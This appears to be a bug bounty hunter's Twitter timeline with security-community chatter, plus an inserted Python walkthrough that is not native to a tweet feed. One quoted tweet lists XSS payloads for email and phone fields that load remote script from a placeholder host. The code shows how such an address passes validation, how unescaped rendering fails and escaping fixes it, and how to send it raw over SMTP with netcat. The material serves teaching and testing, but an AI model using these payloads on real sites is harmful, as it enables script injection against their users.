plenum 🇹🇳
@plenumlab

1K posts
I work as a QA and part-time bounty hunter. @hackerone @bugcrowd @intigriti Plenum

France · Joined January 2018
396 Following · 3.5K Followers

Pinned tweet
plenum 🇹🇳 @plenumlab
I just published Identifying and Exploiting Unsafe Deserialization in Ruby XMLRPC link.medium.com/tc9mOBQlUBb
plenum 🇹🇳 retweeted
Volerion @VolerionSec
Launching today! Volerion transforms raw CVEs into structured and instant insights #CVE #CyberSecurity #infosec
plenum 🇹🇳 @plenumlab
@NahamSec And then I wonder why I keep doing this to myself
Ben Sadeghipour @NahamSec
Me: I really need to relax. Also me: launches into Call of Duty Warzone
Blaklis @Blaklis_
@SopraSteriaSecu Since I have no other way to contact you: next time, it would be nice to *ask* before using someone's image for your marketing. That really is the bare minimum, especially when you're a security company...
Joseph Thacker @rez0__
HUGE personal life update! 💻😊 Yesterday was my last day as a Principal AI Engineer at AppOmni. Today, I'm a full-time bug bounty hunter and solo founder.
- AppOmni is amazing, and I still support them fully. I was there almost 5 years!
- I'm freaking pumped to do full-time bug bounty hacking! It's fun, challenging, and something I'm really passionate about.
- Solo Founder: I'm going to keep building apps (mostly AI-powered) like the hacking plugin I released a couple of weeks ago called Shift.
- Podcasting: I'm the new Co-Host of the Critical Thinking Bug Bounty Podcast (@ctbbpodcast)! 🎉
- I'm going to keep blogging and posting to my email list.
I'm extremely excited for this next chapter and everything it entails. Links for all the stuff above are in the first reply. Please check out the blog, email list, and discord!
plenum 🇹🇳 @plenumlab
@intigriti SSRF -> DNS rebinding -> access to cloud metadata. The rest is history 😁
Intigriti @intigriti
Happy Halloween 🎃👻 In the final week of our Cybersecurity Awareness Month competition, we want to know... 💻 What SSRF vulnerabilities have you found? 😱 And what impact could they have had if exploited? Head to our Instagram for entry details and competition rules 👇 buff.ly/40nkysd
Joseph Thacker @rez0__
Small announcement 😊 🎉 I've learned a crazy amount about AI tooling and AI implementation over the last 2 years, so I'm launching an AI consulting side hustle. Naturally I've got a primary strength of hacking/security, but I've been a Principal AI Engineer for the last year and have built multiple AI applications. I've already consulted several companies on the best way to build AI applications that are high quality, fast, and secure. If you're interested, reach out at the site below in the first reply or email joseph@rez0corp.com.
plenum 🇹🇳 @plenumlab
@albinowax @h4x0r_dz Hiding individual cookies by name is also interesting, to be able to hide all the tracking and unnecessary cookies
James Kettle @albinowax
@h4x0r_dz Do you want to name individual cookies to hide?
H4x0r.DZ 🇰🇵 @h4x0r_dz
Hey @Burp_Suite, can you please add an option to customize "uninteresting headers"? I want to hide the long cookies from all the request headers too. If you add this option, it will be amazing!
godiego @_godiego__
So funny how sometimes you can clearly see something is ChatGPT-written 😂
plenum 🇹🇳 @plenumlab
@Jhaddix @DanaEpp @rez0__ @Shopify @G0LDEN_infosec Agreed. Regardless of the program, things have been piling up for quite some time now, and we have seen this behaviour becoming more common. Some reports have already been disclosed where we clearly see triage or the vendor giving wrong CVSS explanations, sometimes totally made up.
JS0N Haddix @Jhaddix
It's not my bug, and they closed comms with @G0LDEN_infosec even after appeal. How is he supposed to have a convo in private? There's no recourse for him. He happened to mention his frustration in Discord. There was a thread in another Discord talking about the program in a negative way. So I tweeted. But if I hadn't, there'd be no options left for him. THEN people came out from everywhere. That's not on me. You are saying I should have back-channeled with people I know at the program. I'm saying that bug hunters shouldn't need a profile like mine to get some help.
JS0N Haddix @Jhaddix
Well, this is kind of going bug bounty viral... MULTIPLE DMs on Discord from LEGIT researchers showing me bugs downgraded. Or BS reasons for invalidating. Yikes
Quoting JS0N Haddix @Jhaddix:
Hey @Shopify @Hacker0x01 ... I have had two bug hunters come to me and tell me horror stories about your bug bounty lately. Valid bugs being exploited and you coming out saying... "oh we had planned on fixing that... no impact". That is NOT the bug bounty contract. If there is a PoC showing the bug was exploitable at ANY time, you should pay the researcher. Don't contribute to a bug bounty community that makes researchers think bug bounty is a scam. Also - don't hide behind the new CVSS. Program owners looking to downgrade bugs to save money using the new CVSS and splitting bugs are SUPER scummy. Contact @G0LDEN_infosec
Joseph Thacker @rez0__
You’re routing a bastion. I’m routing the most efficient path to clean up my kids’ toys all over the yard. We are not the same.
plenum 🇹🇳 @plenumlab
@zseano Glad it went well, hope you get well soon buddy
zseano @zseano
Home sweet home 🙌 Very tired & sore! They told me it was severely infected & they were worried it would pop inside me & run the risk of sepsis, so I had "emergency surgery". Now the healing begins 🙏 Ready for bed 😴😂
zseano @zseano
Been in hospital since yesterday waiting for surgery to remove an infected abscess, getting quite fed up now! So damn hungry. Wish I'd brought my laptop to do some hacking 😴
plenum 🇹🇳 @plenumlab
@ctbbpodcast @domain Fun fact: you can actually exploit it the other way around. If the app accepts incoming emails and uses/shows the sender field, you can send emails with netcat; although it is tricky not to break SMTP syntax, it is still a nice bug. medium.com/bugbountywrite…
Critical Thinking - Bug Bounty Podcast
RFC-compliant payloads to try and put in your username or telephone number fields on your next target:
Email: "><img/src/onerror=import('//domain/')>"@domain.com
Mobile: 013371337;ext=<img/src/onerror=import('//domain/')>
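The two tweets above (the podcast's email payload and plenum's reply about putting the same kind of value in the sender field over raw SMTP) rest on one fact: the quoted-string form of an RFC 5322 local part may contain `<`, `>`, `/`, `(`, `)`, `'` and `=`, so a validator that correctly implements the grammar accepts the payload, and the bug is entirely in whether the application escapes the value when it renders it. The following is an added example, not code from either tweet or from the podcast. It implements a simplified addr-spec validator, shows the vulnerable and the fixed rendering side by side, and builds the client half of a raw SMTP session of the kind you would pipe into netcat; the function names, `client.example`, `victim@domain.com` and the sample message body are the example's own choices, and only the email payload is taken from the tweet.

```python
import html
import re

# Simplified RFC 5322 addr-spec: local-part is a dot-atom or a quoted-string,
# domain is a dot-atom of DNS labels. Comments and folding whitespace are not
# supported, which is the usual simplification in sign-up forms.
ATEXT = r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]"
DOT_ATOM = rf"{ATEXT}+(?:\.{ATEXT}+)*"
# Inside a quoted-string, qtext excludes only CR, LF, '"' and '\'. Everything
# the payload uses ('<', '>', '/', '(', ')', "'" and '=') is legal as-is.
QUOTED_STRING = r'"(?:[^"\\\r\n]|\\[ -~])*"'
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
DOMAIN = rf"{LABEL}(?:\.{LABEL})+"
ADDR_SPEC = re.compile(rf"(?:{DOT_ATOM}|{QUOTED_STRING})@{DOMAIN}")

# The email payload from the tweet above; only the local part is attacker-shaped.
XSS_EMAIL = "\"><img/src/onerror=import('//domain/')>\"@domain.com"


def is_valid_addr_spec(addr: str) -> bool:
    """True if addr matches the simplified RFC 5322 addr-spec grammar above."""
    return len(addr) <= 254 and ADDR_SPEC.fullmatch(addr) is not None


def render_email_cell_unsafe(addr: str) -> str:
    """Vulnerable rendering: the value passed validation, so it is trusted verbatim."""
    return f"<td>{addr}</td>"


def render_email_cell(addr: str) -> str:
    """Fixed rendering: validity is not safety, so escape for the HTML context."""
    return f"<td>{html.escape(addr, quote=True)}</td>"


def smtp_session(sender: str, recipient: str, subject: str, body: str) -> list:
    """Client side of a raw SMTP session, one CRLF-terminated line per element.

    This is the text you would pipe into `nc target 25` (assumed hostnames).
    RFC 5321 lets the reverse-path local part be a quoted-string, so the
    payload goes inside the angle brackets untouched. Two things break the
    session if forgotten: every line must end in CRLF, and any body line that
    starts with '.' must be dot-stuffed, otherwise a bare '.' ends DATA early.
    """
    if not (is_valid_addr_spec(sender) and is_valid_addr_spec(recipient)):
        raise ValueError("sender and recipient must be addr-spec")
    headers = [f"From: <{sender}>", f"To: <{recipient}>", f"Subject: {subject}", ""]
    stuffed = [("." + ln) if ln.startswith(".") else ln for ln in body.split("\n")]
    lines = [
        "EHLO client.example",  # example client hostname, an assumption
        f"MAIL FROM:<{sender}>",
        f"RCPT TO:<{recipient}>",
        "DATA",
        *headers,
        *stuffed,
        ".",  # end of DATA
        "QUIT",
    ]
    return [ln + "\r\n" for ln in lines]


if __name__ == "__main__":
    # Constructed sample run: the validator accepts the payload, the unsafe
    # cell carries live markup, the escaped cell is inert text.
    assert is_valid_addr_spec(XSS_EMAIL)
    print(render_email_cell_unsafe(XSS_EMAIL))
    print(render_email_cell(XSS_EMAIL))
    print("".join(smtp_session(XSS_EMAIL, "victim@domain.com", "hello",
                               "line one\n.hidden")), end="")
```

The point of `smtp_session` is the envelope: `MAIL FROM:<"><img/src/onerror=import('//domain/')>"@domain.com>` is a legal reverse-path, and a receiving application that later displays the sender without escaping has the same bug as the sign-up form, just reached from the other direction. The validator deliberately rejects a bare `localhost` domain and unquoted special characters so you can see that the payload passes on its merits, not because the check is sloppy.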
godiego @_godiego__
Today, on "how to scam hackers": an unauthenticated mass PII leak rated Medium because the data cannot be used to compromise a system 🤡
plenum 🇹🇳 @plenumlab
Are you a hacker?
plenum 🇹🇳 @plenumlab
I'm buying this one.